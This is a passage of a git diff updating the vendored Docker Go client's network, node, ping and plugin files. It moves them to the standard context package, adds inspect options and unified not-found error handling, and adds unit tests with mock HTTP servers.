index 4067a541ff..41da2ac610 100644
--- a/vendor/github.com/docker/docker/client/network_create.go
+++ b/vendor/github.com/docker/docker/client/network_create.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // NetworkCreate creates a new network in the docker host.
diff --git a/vendor/github.com/docker/docker/client/network_create_test.go b/vendor/github.com/docker/docker/client/network_create_test.go
index 0e2457f89c..894c98ebb3 100644
--- a/vendor/github.com/docker/docker/client/network_create_test.go
+++ b/vendor/github.com/docker/docker/client/network_create_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestNetworkCreateError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/network_disconnect.go b/vendor/github.com/docker/docker/client/network_disconnect.go
index 24b58e3c12..dd15676656 100644
--- a/vendor/github.com/docker/docker/client/network_disconnect.go
+++ b/vendor/github.com/docker/docker/client/network_disconnect.go
@@ -1,8 +1,9 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
+
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // NetworkDisconnect disconnects a container from an existent network in the docker host.
diff --git a/vendor/github.com/docker/docker/client/network_disconnect_test.go b/vendor/github.com/docker/docker/client/network_disconnect_test.go
index b54a2b1ccf..b27b955e2e 100644
--- a/vendor/github.com/docker/docker/client/network_disconnect_test.go
+++ b/vendor/github.com/docker/docker/client/network_disconnect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestNetworkDisconnectError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/network_inspect.go b/vendor/github.com/docker/docker/client/network_inspect.go
index 5ad4ea5bf3..025f6d8757 100644
--- a/vendor/github.com/docker/docker/client/network_inspect.go
+++ b/vendor/github.com/docker/docker/client/network_inspect.go
@@ -1,30 +1,41 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
+	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // NetworkInspect returns the information for a specific network configured in the docker host.
-func (cli *Client) NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error) {
-	networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID)
+func (cli *Client) NetworkInspect(ctx context.Context, networkID string, options types.NetworkInspectOptions) (types.NetworkResource, error) {
+	networkResource, _, err := cli.NetworkInspectWithRaw(ctx, networkID, options)
 	return networkResource, err
 }
 
 // NetworkInspectWithRaw returns the information for a specific network configured in the docker host and its raw representation.
-func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error) {
-	var networkResource types.NetworkResource
-	resp, err := cli.get(ctx, "/networks/"+networkID, nil, nil)
+func (cli *Client) NetworkInspectWithRaw(ctx context.Context, networkID string, options types.NetworkInspectOptions) (types.NetworkResource, []byte, error) {
+	if networkID == "" {
+		return types.NetworkResource{}, nil, objectNotFoundError{object: "network", id: networkID}
+	}
+	var (
+		networkResource types.NetworkResource
+		resp            serverResponse
+		err             error
+	)
+	query := url.Values{}
+	if options.Verbose {
+		query.Set("verbose", "true")
+	}
+	if options.Scope != "" {
+		query.Set("scope", options.Scope)
+	}
+	resp, err = cli.get(ctx, "/networks/"+networkID, query, nil)
 	if err != nil {
-		if resp.statusCode == http.StatusNotFound {
-			return networkResource, nil, networkNotFoundError{networkID}
-		}
-		return networkResource, nil, err
+		return networkResource, nil, wrapResponseError(err, resp, "network", networkID)
 	}
 	defer ensureReaderClosed(resp)
 
diff --git a/vendor/github.com/docker/docker/client/network_inspect_test.go b/vendor/github.com/docker/docker/client/network_inspect_test.go
index 1f926d66ba..699bccba67 100644
--- a/vendor/github.com/docker/docker/client/network_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/network_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,10 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/network"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestNetworkInspectError(t *testing.T) {
@@ -18,20 +22,29 @@ func TestNetworkInspectError(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
-	_, err := client.NetworkInspect(context.Background(), "nothing")
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
-	}
+	_, err := client.NetworkInspect(context.Background(), "nothing", types.NetworkInspectOptions{})
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
 }
 
-func TestNetworkInspectContainerNotFound(t *testing.T) {
+func TestNetworkInspectNotFoundError(t *testing.T) {
 	client := &Client{
-		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+		client: newMockClient(errorMock(http.StatusNotFound, "missing")),
 	}
 
-	_, err := client.NetworkInspect(context.Background(), "unknown")
-	if err == nil || !IsErrNetworkNotFound(err) {
-		t.Fatalf("expected a containerNotFound error, got %v", err)
+	_, err := client.NetworkInspect(context.Background(), "unknown", types.NetworkInspectOptions{})
+	assert.Check(t, is.Error(err, "Error: No such network: unknown"))
+	assert.Check(t, IsErrNotFound(err))
+}
+
+func TestNetworkInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.NetworkInspectWithRaw(context.Background(), "", types.NetworkInspectOptions{})
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
 	}
 }
 
@@ -46,9 +59,30 @@ func TestNetworkInspect(t *testing.T) {
 				return nil, fmt.Errorf("expected GET method, got %s", req.Method)
 			}
 
-			content, err := json.Marshal(types.NetworkResource{
-				Name: "mynetwork",
-			})
+			var (
+				content []byte
+				err     error
+			)
+			if strings.Contains(req.URL.RawQuery, "scope=global") {
+				return &http.Response{
+					StatusCode: http.StatusNotFound,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}
+
+			if strings.Contains(req.URL.RawQuery, "verbose=true") {
+				s := map[string]network.ServiceInfo{
+					"web": {},
+				}
+				content, err = json.Marshal(types.NetworkResource{
+					Name:     "mynetwork",
+					Services: s,
+				})
+			} else {
+				content, err = json.Marshal(types.NetworkResource{
+					Name: "mynetwork",
+				})
+			}
 			if err != nil {
 				return nil, err
 			}
@@ -59,11 +93,26 @@ func TestNetworkInspect(t *testing.T) {
 		}),
 	}
 
-	r, err := client.NetworkInspect(context.Background(), "network_id")
+	r, err := client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{})
 	if err != nil {
 		t.Fatal(err)
 	}
 	if r.Name != "mynetwork" {
 		t.Fatalf("expected `mynetwork`, got %s", r.Name)
 	}
+
+	r, err = client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{Verbose: true})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.Name != "mynetwork" {
+		t.Fatalf("expected `mynetwork`, got %s", r.Name)
+	}
+	_, ok := r.Services["web"]
+	if !ok {
+		t.Fatalf("expected service `web` missing in the verbose output")
+	}
+
+	_, err = client.NetworkInspect(context.Background(), "network_id", types.NetworkInspectOptions{Scope: "global"})
+	assert.Check(t, is.Error(err, "Error: No such network: network_id"))
 }
diff --git a/vendor/github.com/docker/docker/client/network_list.go b/vendor/github.com/docker/docker/client/network_list.go
index e566a93e23..f16b2f5624 100644
--- a/vendor/github.com/docker/docker/client/network_list.go
+++ b/vendor/github.com/docker/docker/client/network_list.go
@@ -1,12 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 // NetworkList returns the list of networks configured in the docker host.
diff --git a/vendor/github.com/docker/docker/client/network_list_test.go b/vendor/github.com/docker/docker/client/network_list_test.go
index 4d443496ac..5263808cfd 100644
--- a/vendor/github.com/docker/docker/client/network_list_test.go
+++ b/vendor/github.com/docker/docker/client/network_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -11,7 +12,6 @@ import (
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 func TestNetworkListError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/network_prune.go b/vendor/github.com/docker/docker/client/network_prune.go
index 7352a7f0c5..6418b8b607 100644
--- a/vendor/github.com/docker/docker/client/network_prune.go
+++ b/vendor/github.com/docker/docker/client/network_prune.go
@@ -1,12 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 // NetworksPrune requests the daemon to delete unused networks
diff --git a/vendor/github.com/docker/docker/client/network_prune_test.go b/vendor/github.com/docker/docker/client/network_prune_test.go
new file mode 100644
index 0000000000..7a5d340e51
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_prune_test.go
@@ -0,0 +1,113 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestNetworksPruneError(t *testing.T) {
+	client := &Client{
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+	}
+
+	filters := filters.NewArgs()
+
+	_, err := client.NetworksPrune(context.Background(), filters)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNetworksPrune(t *testing.T) {
+	expectedURL := "/v1.25/networks/prune"
+
+	danglingFilters := filters.NewArgs()
+	danglingFilters.Add("dangling", "true")
+
+	noDanglingFilters := filters.NewArgs()
+	noDanglingFilters.Add("dangling", "false")
+
+	labelFilters := filters.NewArgs()
+	labelFilters.Add("dangling", "true")
+	labelFilters.Add("label", "label1=foo")
+	labelFilters.Add("label", "label2!=bar")
+
+	listCases := []struct {
+		filters             filters.Args
+		expectedQueryParams map[string]string
+	}{
+		{
+			filters: filters.Args{},
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": "",
+			},
+		},
+		{
+			filters: danglingFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true}}`,
+			},
+		},
+		{
+			filters: noDanglingFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"false":true}}`,
+			},
+		},
+		{
+			filters: labelFilters,
+			expectedQueryParams: map[string]string{
+				"until":   "",
+				"filter":  "",
+				"filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					assert.Check(t, is.Equal(expected, actual))
+				}
+				content, err := json.Marshal(types.NetworksPruneReport{
+					NetworksDeleted: []string{"network_id1", "network_id2"},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+			version: "1.25",
+		}
+
+		report, err := client.NetworksPrune(context.Background(), listCase.filters)
+		assert.Check(t, err)
+		assert.Check(t, is.Len(report.NetworksDeleted, 2))
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/network_remove.go b/vendor/github.com/docker/docker/client/network_remove.go
index 6bd6748924..12741437be 100644
--- a/vendor/github.com/docker/docker/client/network_remove.go
+++ b/vendor/github.com/docker/docker/client/network_remove.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
-import "golang.org/x/net/context"
+import "context"
 
 // NetworkRemove removes an existent network from the docker host.
 func (cli *Client) NetworkRemove(ctx context.Context, networkID string) error {
 	resp, err := cli.delete(ctx, "/networks/"+networkID, nil, nil)
 	ensureReaderClosed(resp)
-	return err
+	return wrapResponseError(err, resp, "network", networkID)
 }
diff --git a/vendor/github.com/docker/docker/client/network_remove_test.go b/vendor/github.com/docker/docker/client/network_remove_test.go
index 2a7b9640c1..ac40af74e6 100644
--- a/vendor/github.com/docker/docker/client/network_remove_test.go
+++ b/vendor/github.com/docker/docker/client/network_remove_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestNetworkRemoveError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/node_inspect.go b/vendor/github.com/docker/docker/client/node_inspect.go
index abf505d29c..593b2e9f0b 100644
--- a/vendor/github.com/docker/docker/client/node_inspect.go
+++ b/vendor/github.com/docker/docker/client/node_inspect.go
@@ -1,23 +1,22 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // NodeInspectWithRaw returns the node information.
 func (cli *Client) NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) {
+	if nodeID == "" {
+		return swarm.Node{}, nil, objectNotFoundError{object: "node", id: nodeID}
+	}
 	serverResp, err := cli.get(ctx, "/nodes/"+nodeID, nil, nil)
 	if err != nil {
-		if serverResp.statusCode == http.StatusNotFound {
-			return swarm.Node{}, nil, nodeNotFoundError{nodeID}
-		}
-		return swarm.Node{}, nil, err
+		return swarm.Node{}, nil, wrapResponseError(err, serverResp, "node", nodeID)
 	}
 	defer ensureReaderClosed(serverResp)
 
diff --git a/vendor/github.com/docker/docker/client/node_inspect_test.go b/vendor/github.com/docker/docker/client/node_inspect_test.go
index fc13283084..d0fdace7fe 100644
--- a/vendor/github.com/docker/docker/client/node_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/node_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,7 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
 func TestNodeInspectError(t *testing.T) {
@@ -30,8 +31,20 @@ func TestNodeInspectNodeNotFound(t *testing.T) {
 	}
 
 	_, _, err := client.NodeInspectWithRaw(context.Background(), "unknown")
-	if err == nil || !IsErrNodeNotFound(err) {
-		t.Fatalf("expected an nodeNotFoundError error, got %v", err)
+	if err == nil || !IsErrNotFound(err) {
+		t.Fatalf("expected a nodeNotFoundError error, got %v", err)
+	}
+}
+
+func TestNodeInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.NodeInspectWithRaw(context.Background(), "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
 	}
 }
 
diff --git a/vendor/github.com/docker/docker/client/node_list.go b/vendor/github.com/docker/docker/client/node_list.go
index 3e8440f08e..9883f6fc52 100644
--- a/vendor/github.com/docker/docker/client/node_list.go
+++ b/vendor/github.com/docker/docker/client/node_list.go
@@ -1,13 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // NodeList returns the list of nodes.
@@ -15,7 +15,7 @@ func (cli *Client) NodeList(ctx context.Context, options types.NodeListOptions)
 	query := url.Values{}
 
 	if options.Filters.Len() > 0 {
-		filterJSON, err := filters.ToParam(options.Filters)
+		filterJSON, err := filters.ToJSON(options.Filters)
 
 		if err != nil {
 			return nil, err
diff --git a/vendor/github.com/docker/docker/client/node_list_test.go b/vendor/github.com/docker/docker/client/node_list_test.go
index 0251b5cce4..784a754a59 100644
--- a/vendor/github.com/docker/docker/client/node_list_test.go
+++ b/vendor/github.com/docker/docker/client/node_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -12,7 +13,6 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 func TestNodeListError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/node_remove.go b/vendor/github.com/docker/docker/client/node_remove.go
index 0a77f3d578..e7a7505715 100644
--- a/vendor/github.com/docker/docker/client/node_remove.go
+++ b/vendor/github.com/docker/docker/client/node_remove.go
@@ -1,11 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-
-	"golang.org/x/net/context"
 )
 
 // NodeRemove removes a Node.
@@ -17,5 +16,5 @@ func (cli *Client) NodeRemove(ctx context.Context, nodeID string, options types.
 
 	resp, err := cli.delete(ctx, "/nodes/"+nodeID, query, nil)
 	ensureReaderClosed(resp)
-	return err
+	return wrapResponseError(err, resp, "node", nodeID)
 }
diff --git a/vendor/github.com/docker/docker/client/node_remove_test.go b/vendor/github.com/docker/docker/client/node_remove_test.go
index f2f8adc4a3..85f828b849 100644
--- a/vendor/github.com/docker/docker/client/node_remove_test.go
+++ b/vendor/github.com/docker/docker/client/node_remove_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,8 +10,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-
-	"golang.org/x/net/context"
 )
 
 func TestNodeRemoveError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/node_update.go b/vendor/github.com/docker/docker/client/node_update.go
index 3ca9760282..de32a617fb 100644
--- a/vendor/github.com/docker/docker/client/node_update.go
+++ b/vendor/github.com/docker/docker/client/node_update.go
@@ -1,11 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 	"strconv"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // NodeUpdate updates a Node.
diff --git a/vendor/github.com/docker/docker/client/node_update_test.go b/vendor/github.com/docker/docker/client/node_update_test.go
index 613ff104eb..d89e1ed858 100644
--- a/vendor/github.com/docker/docker/client/node_update_test.go
+++ b/vendor/github.com/docker/docker/client/node_update_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types/swarm"
 )
 
diff --git a/vendor/github.com/docker/docker/client/ping.go b/vendor/github.com/docker/docker/client/ping.go
index 22dcda24fd..85d38adb51 100644
--- a/vendor/github.com/docker/docker/client/ping.go
+++ b/vendor/github.com/docker/docker/client/ping.go
@@ -1,16 +1,16 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
-	"fmt"
+	"context"
+	"path"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
-// Ping pings the server and return the value of the "Docker-Experimental" & "API-Version" headers
+// Ping pings the server and returns the value of the "Docker-Experimental", "OS-Type" & "API-Version" headers
 func (cli *Client) Ping(ctx context.Context) (types.Ping, error) {
 	var ping types.Ping
-	req, err := cli.buildRequest("GET", fmt.Sprintf("%s/_ping", cli.basePath), nil, nil)
+	req, err := cli.buildRequest("GET", path.Join(cli.basePath, "/_ping"), nil, nil)
 	if err != nil {
 		return ping, err
 	}
@@ -20,11 +20,13 @@ func (cli *Client) Ping(ctx context.Context) (types.Ping, error) {
 	}
 	defer ensureReaderClosed(serverResp)
 
-	ping.APIVersion = serverResp.header.Get("API-Version")
+	if serverResp.header != nil {
+		ping.APIVersion = serverResp.header.Get("API-Version")
 
-	if serverResp.header.Get("Docker-Experimental") == "true" {
-		ping.Experimental = true
+		if serverResp.header.Get("Docker-Experimental") == "true" {
+			ping.Experimental = true
+		}
+		ping.OSType = serverResp.header.Get("OSType")
 	}
-
-	return ping, nil
+	return ping, cli.checkResponseErr(serverResp)
 }
diff --git a/vendor/github.com/docker/docker/client/ping_test.go b/vendor/github.com/docker/docker/client/ping_test.go
new file mode 100644
index 0000000000..10bbbe811d
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/ping_test.go
@@ -0,0 +1,83 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"errors"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+// TestPingFail tests that when a server sends a non-successful response that we
+// can still grab API details, when set.
+// Some of this is just exercising the code paths to make sure there are no
+// panics.
+func TestPingFail(t *testing.T) {
+	var withHeader bool
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			resp := &http.Response{StatusCode: http.StatusInternalServerError}
+			if withHeader {
+				resp.Header = http.Header{}
+				resp.Header.Set("API-Version", "awesome")
+				resp.Header.Set("Docker-Experimental", "true")
+			}
+			resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server"))
+			return resp, nil
+		}),
+	}
+
+	ping, err := client.Ping(context.Background())
+	assert.Check(t, is.ErrorContains(err, ""))
+	assert.Check(t, is.Equal(false, ping.Experimental))
+	assert.Check(t, is.Equal("", ping.APIVersion))
+
+	withHeader = true
+	ping2, err := client.Ping(context.Background())
+	assert.Check(t, is.ErrorContains(err, ""))
+	assert.Check(t, is.Equal(true, ping2.Experimental))
+	assert.Check(t, is.Equal("awesome", ping2.APIVersion))
+}
+
+// TestPingWithError tests the case where there is a protocol error in the ping.
+// This test is mostly just testing that there are no panics in this code path.
+func TestPingWithError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			resp := &http.Response{StatusCode: http.StatusInternalServerError}
+			resp.Header = http.Header{}
+			resp.Header.Set("API-Version", "awesome")
+			resp.Header.Set("Docker-Experimental", "true")
+			resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server"))
+			return resp, errors.New("some error")
+		}),
+	}
+
+	ping, err := client.Ping(context.Background())
+	assert.Check(t, is.ErrorContains(err, ""))
+	assert.Check(t, is.Equal(false, ping.Experimental))
+	assert.Check(t, is.Equal("", ping.APIVersion))
+}
+
+// TestPingSuccess tests that we are able to get the expected API headers/ping
+// details on success.
+func TestPingSuccess(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			resp := &http.Response{StatusCode: http.StatusInternalServerError}
+			resp.Header = http.Header{}
+			resp.Header.Set("API-Version", "awesome")
+			resp.Header.Set("Docker-Experimental", "true")
+			resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server"))
+			return resp, nil
+		}),
+	}
+	ping, err := client.Ping(context.Background())
+	assert.Check(t, is.ErrorContains(err, ""))
+	assert.Check(t, is.Equal(true, ping.Experimental))
+	assert.Check(t, is.Equal("awesome", ping.APIVersion))
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_create.go b/vendor/github.com/docker/docker/client/plugin_create.go
index a660ba5733..4591db50fd 100644
--- a/vendor/github.com/docker/docker/client/plugin_create.go
+++ b/vendor/github.com/docker/docker/client/plugin_create.go
@@ -1,18 +1,18 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/http"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // PluginCreate creates a plugin
 func (cli *Client) PluginCreate(ctx context.Context, createContext io.Reader, createOptions types.PluginCreateOptions) error {
 	headers := http.Header(make(map[string][]string))
-	headers.Set("Content-Type", "application/tar")
+	headers.Set("Content-Type", "application/x-tar")
 
 	query := url.Values{}
 	query.Set("name", createOptions.RepoName)
diff --git a/vendor/github.com/docker/docker/client/plugin_disable.go b/vendor/github.com/docker/docker/client/plugin_disable.go
index 30467db742..01f6574f95 100644
--- a/vendor/github.com/docker/docker/client/plugin_disable.go
+++ b/vendor/github.com/docker/docker/client/plugin_disable.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // PluginDisable disables a plugin
diff --git a/vendor/github.com/docker/docker/client/plugin_disable_test.go b/vendor/github.com/docker/docker/client/plugin_disable_test.go
index a4de45be2d..ac2413d6c5 100644
--- a/vendor/github.com/docker/docker/client/plugin_disable_test.go
+++ b/vendor/github.com/docker/docker/client/plugin_disable_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,7 +10,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestPluginDisableError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/plugin_enable.go b/vendor/github.com/docker/docker/client/plugin_enable.go
index 95517c4b80..736da48bd1 100644
--- a/vendor/github.com/docker/docker/client/plugin_enable.go
+++ b/vendor/github.com/docker/docker/client/plugin_enable.go
@@ -1,11 +1,11 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 	"strconv"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // PluginEnable enables a plugin
diff --git a/vendor/github.com/docker/docker/client/plugin_enable_test.go b/vendor/github.com/docker/docker/client/plugin_enable_test.go
index b27681348f..911ccaf1e9 100644
--- a/vendor/github.com/docker/docker/client/plugin_enable_test.go
+++ b/vendor/github.com/docker/docker/client/plugin_enable_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,7 +10,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestPluginEnableError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/plugin_inspect.go b/vendor/github.com/docker/docker/client/plugin_inspect.go
index 89f39ee2c6..0ab7beaee8 100644
--- a/vendor/github.com/docker/docker/client/plugin_inspect.go
+++ b/vendor/github.com/docker/docker/client/plugin_inspect.go
@@ -1,23 +1,22 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // PluginInspectWithRaw inspects an existing plugin
 func (cli *Client) PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) {
+	if name == "" {
+		return nil, nil, objectNotFoundError{object: "plugin", id: name}
+	}
 	resp, err := cli.get(ctx, "/plugins/"+name+"/json", nil, nil)
 	if err != nil {
-		if resp.statusCode == http.StatusNotFound {
-			return nil, nil, pluginNotFoundError{name}
-		}
-		return nil, nil, err
+		return nil, nil, wrapResponseError(err, resp, "plugin", name)
 	}
 
 	defer ensureReaderClosed(resp)
diff --git a/vendor/github.com/docker/docker/client/plugin_inspect_test.go b/vendor/github.com/docker/docker/client/plugin_inspect_test.go
index fae407eb9b..74ca0f0fc0 100644
--- a/vendor/github.com/docker/docker/client/plugin_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/plugin_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,7 @@ import (
